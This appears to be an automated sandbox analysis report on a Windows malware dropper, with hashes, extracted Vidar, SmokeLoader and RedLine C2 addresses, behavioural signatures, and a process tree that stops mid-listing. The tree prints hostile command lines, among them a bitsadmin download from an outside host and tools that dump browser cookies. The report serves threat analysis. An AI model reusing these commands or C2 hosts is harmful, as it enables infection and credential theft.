Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    90s
  • max time network
    1808s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    31-07-2021 17:21

General

  • Target

    8 (16).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://manicord.top/forum/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

3

C2

213.166.68.170:16810

Extracted

Family

vidar

Version

39.8

Botnet

937

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

39.8

Botnet

903

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    903

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Vidar Stealer 8 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 40 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 24 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1416
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2724
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2664
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2616
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2432
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2400
              • C:\Users\Admin\AppData\Local\Temp\8 (16).exe
                "C:\Users\Admin\AppData\Local\Temp\8 (16).exe"
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:1744
                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2752
                  • C:\Users\Admin\AppData\Local\Temp\7zS0CAFA514\setup_install.exe
                    "C:\Users\Admin\AppData\Local\Temp\7zS0CAFA514\setup_install.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:412
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_1.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1244
                      • C:\Users\Admin\AppData\Local\Temp\7zS0CAFA514\sonia_1.exe
                        sonia_1.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1788
                        • C:\Users\Admin\AppData\Local\Temp\7zS0CAFA514\sonia_1.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS0CAFA514\sonia_1.exe" -a
                          6⤵
                          • Executes dropped EXE
                          PID:4068
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_3.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3372
                      • C:\Users\Admin\AppData\Local\Temp\7zS0CAFA514\sonia_3.exe
                        sonia_3.exe
                        5⤵
                        • Executes dropped EXE
                        • Modifies system certificate store
                        PID:3956
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 928
                          6⤵
                          • Suspicious use of NtCreateProcessExOtherParentProcess
                          • Program crash
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4984
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_2.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3292
                      • C:\Users\Admin\AppData\Local\Temp\7zS0CAFA514\sonia_2.exe
                        sonia_2.exe
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        PID:3864
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_5.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:804
                      • C:\Users\Admin\AppData\Local\Temp\7zS0CAFA514\sonia_5.exe
                        sonia_5.exe
                        5⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        PID:3680
                        • C:\Users\Admin\Documents\BtM9OczHMJjiVo2EKQ0sjXHR.exe
                          "C:\Users\Admin\Documents\BtM9OczHMJjiVo2EKQ0sjXHR.exe"
                          6⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          PID:4436
                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:4512
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              8⤵
                                PID:2576
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                  PID:5876
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  8⤵
                                    PID:5956
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                      PID:4416
                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4792
                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3572
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                        PID:4592
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                        8⤵
                                          PID:5444
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                            PID:4448
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                            8⤵
                                              PID:1680
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:5856
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                8⤵
                                                  PID:4808
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:752
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                  8⤵
                                                    PID:2912
                                              • C:\Users\Admin\Documents\OSTCwSLc_ytoe0eY3Bk0A0n6.exe
                                                "C:\Users\Admin\Documents\OSTCwSLc_ytoe0eY3Bk0A0n6.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4416
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                    PID:2780
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                      PID:5596
                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                        PID:5620
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:6044
                                                      • C:\Users\Admin\Documents\IhBDp51JRNXorByQE2jbIPf_.exe
                                                        "C:\Users\Admin\Documents\IhBDp51JRNXorByQE2jbIPf_.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4396
                                                        • C:\Users\Admin\Documents\IhBDp51JRNXorByQE2jbIPf_.exe
                                                          "C:\Users\Admin\Documents\IhBDp51JRNXorByQE2jbIPf_.exe"
                                                          7⤵
                                                            PID:5924
                                                          • C:\Users\Admin\Documents\IhBDp51JRNXorByQE2jbIPf_.exe
                                                            "C:\Users\Admin\Documents\IhBDp51JRNXorByQE2jbIPf_.exe"
                                                            7⤵
                                                              PID:5944
                                                          • C:\Users\Admin\Documents\5GyW8iHXb1AdIPwO7oDdAUMV.exe
                                                            "C:\Users\Admin\Documents\5GyW8iHXb1AdIPwO7oDdAUMV.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:4352
                                                          • C:\Users\Admin\Documents\witU1_KDedYuPBQom5G0bQK2.exe
                                                            "C:\Users\Admin\Documents\witU1_KDedYuPBQom5G0bQK2.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4356
                                                            • C:\Users\Admin\Documents\witU1_KDedYuPBQom5G0bQK2.exe
                                                              C:\Users\Admin\Documents\witU1_KDedYuPBQom5G0bQK2.exe
                                                              7⤵
                                                                PID:4292
                                                            • C:\Users\Admin\Documents\HDZ79xzi9Wg9yzwOa3tHJtAd.exe
                                                              "C:\Users\Admin\Documents\HDZ79xzi9Wg9yzwOa3tHJtAd.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2104
                                                            • C:\Users\Admin\Documents\kUWh76_Faomo9gPaekkcwm0w.exe
                                                              "C:\Users\Admin\Documents\kUWh76_Faomo9gPaekkcwm0w.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4268
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                  PID:2416
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                    PID:5712
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:5856
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:5132
                                                                    • C:\Users\Admin\Documents\zk8GbGVuRviBAQkMEFhxgxUL.exe
                                                                      "C:\Users\Admin\Documents\zk8GbGVuRviBAQkMEFhxgxUL.exe"
                                                                      6⤵
                                                                        PID:752
                                                                        • C:\Users\Admin\Documents\zk8GbGVuRviBAQkMEFhxgxUL.exe
                                                                          "C:\Users\Admin\Documents\zk8GbGVuRviBAQkMEFhxgxUL.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Checks SCSI registry key(s)
                                                                          PID:4340
                                                                      • C:\Users\Admin\Documents\EVs3NLaxspKDKUT_0skVWg4c.exe
                                                                        "C:\Users\Admin\Documents\EVs3NLaxspKDKUT_0skVWg4c.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:4068
                                                                        • C:\Users\Admin\AppData\Roaming\2243778.exe
                                                                          "C:\Users\Admin\AppData\Roaming\2243778.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:1792
                                                                        • C:\Users\Admin\AppData\Roaming\2967836.exe
                                                                          "C:\Users\Admin\AppData\Roaming\2967836.exe"
                                                                          7⤵
                                                                            PID:3848
                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:2328
                                                                          • C:\Users\Admin\AppData\Roaming\4110603.exe
                                                                            "C:\Users\Admin\AppData\Roaming\4110603.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4148
                                                                        • C:\Users\Admin\Documents\KVunYqOUyofxK2YLgzmkgUvO.exe
                                                                          "C:\Users\Admin\Documents\KVunYqOUyofxK2YLgzmkgUvO.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:1668
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 660
                                                                            7⤵
                                                                            • Program crash
                                                                            PID:4132
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 672
                                                                            7⤵
                                                                            • Program crash
                                                                            PID:4684
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 688
                                                                            7⤵
                                                                            • Program crash
                                                                            PID:4460
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 692
                                                                            7⤵
                                                                            • Program crash
                                                                            PID:3872
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 1080
                                                                            7⤵
                                                                            • Program crash
                                                                            PID:5276
                                                                        • C:\Users\Admin\Documents\awKLC3D1XZzi54NRISEgu1AS.exe
                                                                          "C:\Users\Admin\Documents\awKLC3D1XZzi54NRISEgu1AS.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4100
                                                                          • C:\Users\Admin\Documents\awKLC3D1XZzi54NRISEgu1AS.exe
                                                                            C:\Users\Admin\Documents\awKLC3D1XZzi54NRISEgu1AS.exe
                                                                            7⤵
                                                                              PID:5132
                                                                          • C:\Users\Admin\Documents\2OUx24Je5eznirCXe_9TS0zY.exe
                                                                            "C:\Users\Admin\Documents\2OUx24Je5eznirCXe_9TS0zY.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Drops file in Program Files directory
                                                                            PID:4932
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:5068
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:5584
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:4272
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:5996
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:5572
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:5696
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:5676
                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                            "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                            7⤵
                                                                                            • Download via BitsAdmin
                                                                                            PID:6132
                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -piq4lT5MFzwUkXaO -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                            7⤵
                                                                                              PID:4956
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pctIimdt8OONxQ6y -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              7⤵
                                                                                                PID:1200
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:4528
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:1984
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:1092
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk50E2.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:4320
                                                                                                    • C:\Users\Admin\Documents\SKDeQvvc0kUVDcM2OihC2WEx.exe
                                                                                                      "C:\Users\Admin\Documents\SKDeQvvc0kUVDcM2OihC2WEx.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4332
                                                                                                      • C:\Users\Admin\Documents\SKDeQvvc0kUVDcM2OihC2WEx.exe
                                                                                                        "C:\Users\Admin\Documents\SKDeQvvc0kUVDcM2OihC2WEx.exe"
                                                                                                        7⤵
                                                                                                          PID:5844
                                                                                                      • C:\Users\Admin\Documents\_uGuXGXYnkbCCxno6RuNyKZZ.exe
                                                                                                        "C:\Users\Admin\Documents\_uGuXGXYnkbCCxno6RuNyKZZ.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4636
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 660
                                                                                                          7⤵
                                                                                                          • Program crash
                                                                                                          PID:4292
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 676
                                                                                                          7⤵
                                                                                                          • Program crash
                                                                                                          PID:4844
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 688
                                                                                                          7⤵
                                                                                                          • Program crash
                                                                                                          PID:4992
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 692
                                                                                                          7⤵
                                                                                                          • Program crash
                                                                                                          PID:2576
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 1072
                                                                                                          7⤵
                                                                                                          • Program crash
                                                                                                          PID:5332
                                                                                                      • C:\Users\Admin\Documents\6s8FrBxuAv2X8XJRmm0yOsNq.exe
                                                                                                        "C:\Users\Admin\Documents\6s8FrBxuAv2X8XJRmm0yOsNq.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4740
                                                                                                        • C:\Users\Admin\Documents\6s8FrBxuAv2X8XJRmm0yOsNq.exe
                                                                                                          "C:\Users\Admin\Documents\6s8FrBxuAv2X8XJRmm0yOsNq.exe"
                                                                                                          7⤵
                                                                                                            PID:4448
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                              8⤵
                                                                                                                PID:5816
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                  9⤵
                                                                                                                    PID:5072
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                  8⤵
                                                                                                                    PID:5532
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x200,0x204,0x208,0x1dc,0x20c,0x7ff8435b4f50,0x7ff8435b4f60,0x7ff8435b4f70
                                                                                                                      9⤵
                                                                                                                        PID:4600
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
